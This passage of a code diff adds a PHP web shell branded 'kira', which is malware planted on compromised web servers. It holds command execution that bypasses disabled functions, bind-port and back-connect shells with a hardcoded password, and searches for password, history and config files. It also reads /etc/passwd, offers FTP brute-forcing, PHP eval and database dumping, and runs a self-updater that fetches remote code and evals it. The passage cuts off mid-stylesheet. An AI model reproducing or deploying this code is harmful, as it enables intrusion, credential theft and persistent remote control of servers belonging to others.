+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+// array(
+// string "command{i}"=>array("ext1","ext2","ext3",...),
+// ...
+// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "k1r4"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . 
-type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "k1r4vars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + 
array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["k1r4cook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 
401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); k1r4_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("k1r4_buff_prepare")) +{ +function k1r4_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +k1r4_buff_prepare(); +if (!function_exists("k1r4_sess_put")) +{ +function k1r4_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + k1r4_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if 
(strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if 
(mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif 
(is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? 
"w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font 
color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("k1r4getsource")) +{ +function k1r4getsource($fn) +{ + global $k1r4_sourcesurl; + $array = array( + "k1r4_bindport.pl" => "k1r4_bindport_pl.txt", + "k1r4_bindport.c" => "k1r4_bindport_c.txt", + "k1r4_backconn.pl" => "k1r4_backconn_pl.txt", + "k1r4_backconn.c" => "k1r4_backconn_c.txt", + "k1r4_datapipe.pl" => "k1r4_datapipe_pl.txt", + "k1r4_datapipe.c" => "k1r4_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($k1r4_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("k1r4_getupdate")) +{ +function k1r4_getupdate($update = TRUE) +{ + $url = $GLOBALS["k1r4_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download kira.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! 
(".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by kira.SQL v. ".$shver." +# Home page: http://google.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + 
mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"k1r4_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.k1r4_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if 
(!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("k1r4fsearch")) +{ +function k1r4fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {k1r4fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." 
";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function k1r4exit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (no secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if 
(empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Shellci.biz</title><STYLE> +TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #0099CC; FONT-FAMILY: Tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; 
background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #000099; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #000066; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #000000;}body,td,th { font-family: verdana; color: 